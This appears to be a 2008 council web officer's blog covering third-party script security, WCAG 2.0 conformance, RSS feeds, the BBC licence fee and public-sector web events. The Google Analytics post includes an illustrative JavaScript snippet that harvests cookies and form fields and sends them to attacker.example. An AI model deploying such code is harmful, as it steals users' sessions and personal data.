Monday 24 November 2008

Google Analytics - the risks of 3rd party script

The Register has recently reported on the potential security vulnerability of using Google Analytics, and as we use this for various sites I thought it worth exploring a little further, especially as there are wider implications around linking to any third-party JavaScript code.

The essence of the Register's article, Google Analytics - Yes, it is a security risk, is that any third-party JavaScript you include on your pages could open you up to vulnerabilities. You are essentially at the mercy of the owners of that code, trusting them not to do anything malicious. And there are plenty of things they could do, including stealing session cookies and form data, or even executing a 'cross site script proxy' attack, which could surrender control of a user's login session.
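To make the exposure concrete, here is a minimal and entirely hypothetical sketch of the kind of thing an included third-party script could do, simply because it runs with the same privileges as your own code. To be clear, this is not what Google Analytics does, and the attacker.example address and other names are made up purely for illustration:

```javascript
// Hypothetical sketch only - this is NOT what Google Analytics does.
// It simply shows what any script included from a third-party server
// could do, because it runs with the page's own privileges.
(function () {
  // Read every cookie visible to script, including session cookies
  // that haven't been flagged HttpOnly
  var cookies = document.cookie;

  // Harvest whatever the user has typed into the page's form fields
  var inputs = document.getElementsByTagName('input');
  var fields = [];
  for (var i = 0; i < inputs.length; i++) {
    fields.push(inputs[i].name + '=' + inputs[i].value);
  }

  // Quietly send the lot to a server the site owner knows nothing about
  // (attacker.example is a made-up address)
  new Image().src = 'http://attacker.example/collect' +
    '?c=' + encodeURIComponent(cookies) +
    '&f=' + encodeURIComponent(fields.join('&'));
}());
```

Once the script tag is on your page, the only real defence against something like this is the trustworthiness of whoever serves that file.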

So how big is the risk? There are a couple of factors to consider:

Firstly, how well can the script owner be trusted? A company such as Google can probably be trusted quite a bit, although we're not just talking about the integrity of the company's ethics. We also need to consider how seriously they take security themselves - how stringent are their own practices? Again, we can be fairly sure that Google is pretty hot on best security practices, so the risk is relatively low. The same might not be true of other third party sites.

Secondly, how big a target is your site? The case referred to in the Register's story was Barack Obama's website. That site is obviously going to be a huge target for potential hackers, with security an immensely important consideration. Sites with a lower profile can reasonably be assumed to be less of a target, although the risk still cannot be discounted entirely.

In a recent forum post discussing this issue, the following advice was given:
if you must use external JScript, make sure it is a trusted source, and by trusted, I don't just mean the company and their reputation, but also their own security practises, and do not under any circumstances link 3rd party JScript to a "secured" or sensitive area of a site
This seems to be pretty sensible, and is something we will need to consider from now on, not just in relation to Google Analytics, but when looking at linking to any third party script. Better safe than sorry...

Friday 21 November 2008

Keeping up with your own news

Our organisation has been in the news a fair bit recently. Well, actually, being a local authority we're always in the local news and the coverage is rarely positive (and often inaccurate too). But what I've been increasingly concerned about recently is the fact that the local media keep getting there first - reporting on stories hours, sometimes days, before our own website publishes the information.

The case in point was demonstrated this week when my organisation made some important (and controversial) decisions on school closures. I'm assuming the press were notified through the usual channels, and the news made it onto their websites within hours. We, however, didn't post an update on our website until the following afternoon.

The major problem with this, apart from it looking generally poor, is that it forces citizens to look elsewhere for information that we should be providing them with. This also means that the information they eventually find will probably have been edited, and is usually accompanied by a long string of unmoderated user comments positing all sorts of theories and opinions, many of which are stultifyingly ill-informed (thanks to Chris Morris for that excellent phrase). And of course, most people will probably look to the media first anyway, but perhaps then come to our site to check the facts and to get background information. If we're not providing content to coincide with news stories appearing elsewhere, and making it prominent from the homepage, we're really failing our users.

It's not that we have a lack of news either. I recently encountered a problem where important press releases were too quickly getting bumped off the home page (which only displays the 3 most recent releases, with a link through to the rest). Our school closures story, for example, got bumped within hours by two stories about awards ceremonies and another about tips for Christmas shopping. Whilst non-critical releases are great (SOCITM's 2008 Better Connected report commended the 76% of local authority sites which featured 'good current news beyond a report of a council meeting or decision'), if the softer stories are drowning out the more important ones we are again failing our users.

This is all compounded by the fact that our site does not support RSS feeds or news alerts, so we're not actively 'pushing' these stories in the first place (SOCITM found that only 33% of local authority sites do either of these things). Our news stories are given good prominence on the homepage, but unless you actually visit our site you probably won't find our press releases.

Another problem (which impacts the speed of all developments on our site) is that content often has to go via various levels of approval before it can be published. By speeding up this approval process, or by further devolving editorial authority, we could drastically improve our ability to react to news and events more quickly and effectively. Only then can we consider ourselves to be, as the Better Connected report puts it, newsworthy.

Key points:
  • Get press releases online as quickly as, or quicker than, the media
  • Make them prominent on the homepage, for a reasonable period of time
  • Explore other methods of distributing news - RSS, alerts, e-mail digests, SMS, news tickers etc

Wednesday 19 November 2008

Live web broadcasts and the BBC licence fee

The hot debate surrounding the BBC licence fee is about to get even more complicated with the BBC's announcement that yet more channels are set to be broadcast live online.

An item on the BBC website today reported:
BBC shows including EastEnders, Heroes and Never Mind The Buzzcocks will be available to watch live online from next week, the BBC has announced.

BBC One and BBC Two will be streamed live - just as BBC Three, BBC Four, CBBC, CBeebies and BBC News are already broadcast on their channel websites.

Director of BBC vision Jana Bennett said this "completes our commitment" to make channels available online.

The live simulcast for both channels will be available from 27 November.

If viewers miss any programmes they will be available for up to a week on the BBC iPlayer.

"From 27 November licence fee payers will be able to watch BBC programmes live wherever they are in the UK on their computers, mobile phones and other portable devices," Ms Bennett said.

According to media watchdog Ofcom, the number of people watching TV on the internet has doubled in the last 12 months.

In 2006, Channel 4 became the first major UK TV channel to be simulcast on the internet.

As The Register points out:
Note "licence fee payers" in that quote. While catching up with shows on iPlayer does not require a TV licence, watching any live broadcast - including over the internet - does.

Big headaches lurk for enforcement authorities if live online viewing enters the mainstream: will cafes that offer Wi-Fi be required to buy a business TV licence in case their customers watch a bit of BBC One, for example?
Might this therefore also affect public libraries, which provide free internet access? And how far will the TV licence enforcers go? We have already seen mobile phone companies passing on details of customers who have purchased 3G or wireless-enabled handsets, so it's not a huge leap to imagine ISPs doing the same (if they're not already doing so).

Then comes the ambiguity of what constitutes a 'live' broadcast. A lot of 'live' streamed content is actually on a delay - a fact proven when you lose the stream and the player reconnects, taking you back to the exact second where you left off. TV Licensing has previously stated that even delayed 'hour plus one' type services would count as live, so we can see how ambiguous this could get.

Finally, how obvious will the difference be between 'live' content (requiring a licence) and non-live content (currently everything on iPlayer - not requiring a licence)? If the difference is subtle, it could make it very easy for people to break the law without even realising it.

Monday 17 November 2008

WCAG 2 - claiming conformance

Anyone wanting to claim conformance to the nascent WCAG 2.0 will have to publish a conformance claim containing some specific required components on their site, according to the documentation found at www.w3.org/TR/WCAG20:
Required components of a conformance claim

Conformance claims are not required. Authors can conform to WCAG 2.0 without making a claim. However, if a conformance claim is made, then the conformance claim must include the following information:
  1. Date of the claim
  2. Guidelines title, version and URI "Web Content Accessibility Guidelines 2.0 at {URI of final document}"
  3. Conformance level satisfied: (Level A, AA or AAA)
  4. A concise description of the Web pages such as a list of URIs for which the claim is made, including whether subdomains are included in the claim.
    • Note 1: The Web pages may be described by list or by an expression which describes all of the URIs included in the claim.
    • Note 2: Web-based products that do not have a URI prior to installation on the customer's Web site may have a statement that the product would conform when installed.
  5. A list of the Web content technologies relied upon.
    • Note: If a conformance logo is used, it would constitute a claim and must be accompanied by the required components of a conformance claim listed above.
Note - the concept of a technology baseline has been dropped.

The Understanding Conformance page gives some examples of wording. In the spirit of this, I decided to produce such a claim for my own Pretty Simple web site, which was used in the implementation report as part of the WCAG 2.0 Candidate Recommendation stage and has, since getting the thumbs up from the WCAG 2.0 Working Group, been claiming conformance.
On September 25th 2008, all Web pages found at www.prettysimple.co.uk conform to the Web Content Accessibility Guidelines 2.0 at www.w3.org/TR/WCAG20. Level Double-A conformance.

The web content technology relied upon is XHTML 1.0 (Strict).

The technologies used but not relied upon are: JavaScript, CSS 2.0, Flash.
I wasn't sure about where to put CSS, but felt that, as it is utilised purely for presentation and not content, it shouldn't be considered a 'relied-upon' technology. The Flash banners are only for presentation, and have images with alt attributes behind them, so are certainly not relied upon. Equally, the JavaScript used to bring in the RSS feeds on the Links page is accompanied by noscript links, so is not essential for any user.
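For what it's worth, here is a rough sketch of one way of keeping JavaScript 'used but not relied upon'. It isn't the actual code on my site (which pairs the script includes with noscript links, as described above), and the function and element names are my own inventions: the markup contains an ordinary link for each feed, and the script, if it runs, swaps that link for the latest headlines.

```javascript
// Sketch only - illustrative names, not the site's actual code.
// The XHTML already contains a plain link for each feed, e.g.
//   <p id="bbc-news"><a href="http://news.bbc.co.uk/">BBC News</a></p>
// so a visitor without JavaScript loses nothing. If this script runs,
// it replaces that link with the latest headlines, which keeps
// JavaScript 'used but not relied upon'.
function enhanceWithHeadlines(containerId, headlines) {
  var container = document.getElementById(containerId);
  if (!container) { return; }            // no hook on this page; do nothing

  var list = document.createElement('ul');
  for (var i = 0; i < headlines.length; i++) {
    var item = document.createElement('li');
    var link = document.createElement('a');
    link.href = headlines[i].url;
    link.appendChild(document.createTextNode(headlines[i].title));
    item.appendChild(link);
    list.appendChild(item);
  }

  container.innerHTML = '';              // remove the fallback link
  container.appendChild(list);
}
```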

I could also go into detail about the Level AAA Success Criteria that I meet, and may do this at some point in the future, along with details of the various user agents with which I have tested the site.

One question that has arisen is when I might be expected to update the statement. Presumably the next time I test the entire site, although given that I am making no significant changes to the pages, and only adding content occasionally, I might be forgiven for updating the date every time I update the website.

Thursday 13 November 2008

World Usability Day

Today was World Usability Day. As the website puts it:
It's about "Making Life Easy" and user friendly. Technology today is too hard to use. A cell phone should be as easy to access as a doorknob. In order to humanize a world that uses technology as an infrastructure for education, healthcare, transportation, government, communication, entertainment, work and other areas, we must develop these technologies in a way that serves people first…

World Usability Day was founded in 2005 as an initiative of the Usability Professionals' Association to ensure that services and products important to human life are easier to access and simpler to use.
A nearby event was put on by local user experience consultancy User Vision, and I've just got back from a very interesting few hours there.

A really interesting presentation by Monty Lilburn introduced us to Loadstone GPS - open source software that utilises GPS on mobile phones, resulting in easy-to-follow directions of significant use to blind and visually impaired people (through the use of mobile screen readers such as Talks or Mobile Speak). We were also shown a great little video that they had made, showing Lilburn navigating his way through Edinburgh using the software on his phone. It can (for now) be seen at www.tinyurl.com/6cukzt.

Elsewhere we saw a demonstration of eye-tracking software, which User Vision's Jamie advocated as a powerful tool capable of producing very meaningful results; Donna was letting people get their hands on her iPhone to see how easy to use it is (or isn't); Ross was giving people a driving test challenge with the latest in iTV software; and I had an interesting chat with their accessibility consultant Mark about everything from WCAG 2.0 to the lack of a decent legal precedent in the UK which would help underline the importance of accessibility standards.

Thanks to Chris, Laura and everyone else at User Vision for an interesting afternoon.

Update - User Vision now have a press release about the day on their website, along with some useful links and a handful of photos (including one of the back of my head!).

Wednesday 12 November 2008

WCAG 2.0 and Delivering Inclusive Websites

In June 2008 the Central Office of Information (COI) produced the Delivering Inclusive Websites guidance:
These guidelines are for public sector website owners and digital media project managers wishing to deliver inclusive, accessible websites. This document sets out the minimum standard of accessibility for public sector web content and web authoring tools. It recommends a user-centred approach to accessibility, taking account of user needs in the planning and procurement phases of web design projects.
These guidelines currently make reference to WCAG 1.0, so I wanted to know what would happen once WCAG 2.0 is approved. There is a paragraph which refers to this, but it is a little vague:
At the time of writing, version 1.0 of the Web Content Accessibility Guidelines is the current standard for web accessibility. At such time that version 2.0 becomes a W3C Recommendation, this policy will be reviewed within six months. Consideration will be given to the adoption of version 2.0 as the minimum standard for public sector websites.
Our organisation is currently looking at options for a new web content management system. As such a procurement would be a long-term commitment, I'm keen to know that the goalposts are not going to move halfway through implementing a solution. Whilst it's true that sites built to conform to WCAG 1.0 should meet WCAG 2.0 without too many problems, I feel it is crucial that the minimum standards are recorded in black and white in any requirements documentation.

I have therefore submitted the following enquiry to the COI:
With WCAG 2.0 currently at Proposed Recommendation stage, and due to be approved by Christmas, what plans are there to modify the information provided as part of the "Delivering inclusive websites" guidelines? What are the timescales involved i.e. how soon should the public sector be building websites according to WCAG 2.0 instead of WCAG 1.0?
and will post the reply here when received.

Update 16th Nov

Reply from COI:
We plan to review adoption of WCAG 2.0 with the public sector community. It is unclear at this stage whether doing so is in our best interests. For example, the new AA requirement for audio description and subtitles for every video would mean that Level-A would be the only realistic option - and then the risk is that no-one implements the other Level-AA requirements.

We would also like to see what the European Commission thinks about the new standard. Anything we do would have to be in line with their thinking.

I don't think there's anything stopping people building to WCAG 2.0. Am I right in thinking that any website that's AA according to version 2.0 is automatically v1.0 compliant?
An extract from my response is as follows:
Unfortunately I don't think it is the case that WCAG 2.0 compliant sites will meet WCAG 1.0, at the equivalent conformance level, by default. There are many WCAG 1.0 checkpoints with the 'until user agents' caveat that WCAG 2.0 has now omitted, due to the conditions being met. Plus there are obvious changes such as no longer requiring accesskeys or metadata to add semantic information to pages, or no longer being required to avoid deprecated features. If you therefore designed according to WCAG 2.0, I would imagine that you might fail against WCAG 1.0 on these sorts of points.

Regarding your point about unrealistic levels of compliance - I know it has been suggested elsewhere that a phased approach might be most appropriate, to account for the cost, time and expertise required to, for example, produce compliant time-based media. There may also be potential to describe the transitional approach in the conformance claim statement (which is required for any site claiming WCAG 2.0 conformance).
Hopefully we'll see some new guidance soon.

Friday 7 November 2008

Getting feeds from your own site

I recently wanted to pull in the news items from our main corporate site onto a partner site, on an existing 'news' page which already pulls in RSS Feeds from other major content providers such as the BBC, Learning Teaching Scotland and the Scottish Government. The trouble is, our corporate site does not generate such feeds, so until now I've had to manually input each new press release.

However, I'd heard that it was possible to grab content from pages even where those pages are not set up to offer RSS feeds.

A bit of searching brought me to feedity.com. This site allows you to easily set up an RSS feed based on the content of your site, and on inputting the target URL it quickly came up with a list of press releases, exactly as intended. You can also fiddle with the results if they're not as expected.

Once you've got your RSS feed, the next task is to pull it into your page. I've used JavaScript to do this, using a handy script generator found at itde.vccs.edu/rss2js.
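For anyone unfamiliar with this kind of service, the sketch below shows the general pattern such generators tend to produce. It is not the actual rss2js output, and the headlines and URLs are invented: the generated file simply document.write()s the feed as an HTML list, you include it with a script element, and a noscript element alongside links straight to the source page for visitors without JavaScript.

```javascript
// A sketch of what a feed-to-JavaScript service typically returns - not the
// actual rss2js output, and the headlines and URLs below are invented.
// The page includes this file with a script element, and a noscript element
// alongside it links straight to the source page for visitors without
// JavaScript.
document.write('<ul class="news-feed">');
document.write('<li><a href="http://www.example.gov.uk/news/1">' +
               'School closure decision announced</a></li>');
document.write('<li><a href="http://www.example.gov.uk/news/2">' +
               'Council wins recycling award</a></li>');
document.write('</ul>');
```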

The end result can be seen at egfl.net/news. You'll see I've got feeds coming in from the sites mentioned above, as well as the newly generated feed from our own council site. There is of course also a noscript alternative linking to the pages with the news items.

Hey presto - no more updating manually!

Edit - there are other services similar to the ones I've mentioned here. For generating RSS feeds, also see Feed43, Dapper or FeedYes. For inserting the feeds into your page, also see RSSinclude or Dynaweb RSS Pal.

PS - don't forget that linking to third-party JavaScript carries a certain degree of risk. See my post about security and Google Analytics for more info.

Thursday 6 November 2008

Public feedback - not a monologue

At the recent Scotweb2 Unconference, James Munro presented Patient Opinion, a website allowing users of the NHS to post feedback on their experiences - very similar to rateMDs.com, which operates in the US. It could be described as 'Trip Advisor for the NHS', in that you can check out a hospital or practice before visiting.

Munro stated that this process was about change, not choice. The aim is to create a dialogue between the service users and service providers. Actually, users were already talking about their experiences - on blogs, flickr, youtube etc - and Patient Opinion aims to provide a single platform to collate these comments and, crucially, to allow service providers to see and respond to the feedback.

The business model sees NHS services being asked to subscribe to get access to specific information, reports and the ability to respond to individual comments online. This then provides them with a platform to report the progress they have made in responding to a complaint, and further drives the idea of change.

The great advantage for the public is that they have a platform to report (often embarrassing) issues anonymously, whilst knowing that real change is also possible as a result. Because the site is independent, Munro claims that people are less inclined to leave the sort of rants that the NHS might expect to be inundated with should the site be owned by them. NHS Choices, the NHS's own site, rejects about 24% of the feedback it receives. Patient Opinion rejects only 5% - not because the standards are different, says Munro, but because people can see the real-life benefit of an independent site and are more inclined to leave legitimate, constructive feedback. And whilst positive feedback is great, the complaints provide the most value.

So what does this mean for other areas of the public sector? One problem is that we can not 'force' third-party independent solutions to come into being - they have to develop organically. Of course, they are already happening across the Web 2.0 platforms mentioned earlier. The trick is to tap into these - not trying to moderate or silence the discussions going on, but to contribute to the stream and show people that we are listening and that change is happening.

There is a major cultural shift required to get backing for this. Once out there, comments cannot be taken back (you might be able to delete the original comment, but who knows where else it has gone). Anything you say must be honest, accountable and representative of the organisation. This may mean it has to go through levels of approval, which can ruin the pace and spontaneity of the dialogue (e.g. whilst you're trying to approve a response to one comment, five more have already cropped up). And there are dangers for those not playing by the rules - think of the recent story of the 13 Virgin Atlantic employees sacked for comments they made on Facebook which, their employers felt, brought the company into disrepute. Nevertheless, it is a whole new channel of communication which we cannot afford to ignore.

Tuesday 4 November 2008

WCAG 2.0 Proposed Recommendation

The WCAG 2.0 Proposed Recommendation has now been published by W3C. It contains revisions made as part of the Candidate Recommendation stage. I provided an implementation experience report as part of this and I'm pleased to say that I've been named as a contributor, so hopefully my experiences proved useful to the process.

Monday 3 November 2008

Scotweb2 Unconference summary

I'll soon be writing more specifically about some of the topics discussed at last Friday's Scotweb2 Unconference, but wanted to start with a brief summary of the day and some key messages I took from it.

All in all, the day was very uplifting and provided some real food for thought. It succeeded wonderfully in bringing together a small but committed number of Web 2.0 enthusiasts, mostly from the public sector but including a few from the commercial world. Although this meant that much of the discussion was in some way 'preaching to the converted', there were still plenty of new ideas to hear about and various calls to action.

Simon Dickson's talk exemplified this well. His passion and enthusiasm for WordPress came over in barrel loads, and he certainly gave people something to think about when comparing the minimal cost of implementing the open-source blogging CMS with some of the multi-million pound projects he has seen in central government. It was also a more general rallying call for us to abandon the notion that quality is defined by cost, given that most of the traditional barriers to accessing these technologies are increasingly being broken down.

James Munro, from Patient Opinion, also delivered an interesting presentation on the relationship between his independent service and the NHS, with plenty of engaging discussion about public perception, trust and the machinations of organisational change through feedback.

Derek Hemphill presented BT Tradespace, which most of the audience confessed to never having heard of. I've now set up my free account so will report back about that soon.

Stephen Dale also gave a brief introduction to the Communities of Practice platform for local gov and public sector professionals to develop and share knowledge. Non public sector members are welcome to join in where appropriate, although overt selling is not tolerated. I myself am a member of three forums and am so far enjoying the experience.

As I say, I'll be writing more about specifics once I've had a chance to collect my thoughts and notes. Thanks again to Alex Stobart for organising what turned out to be a positive and exciting day of discussion.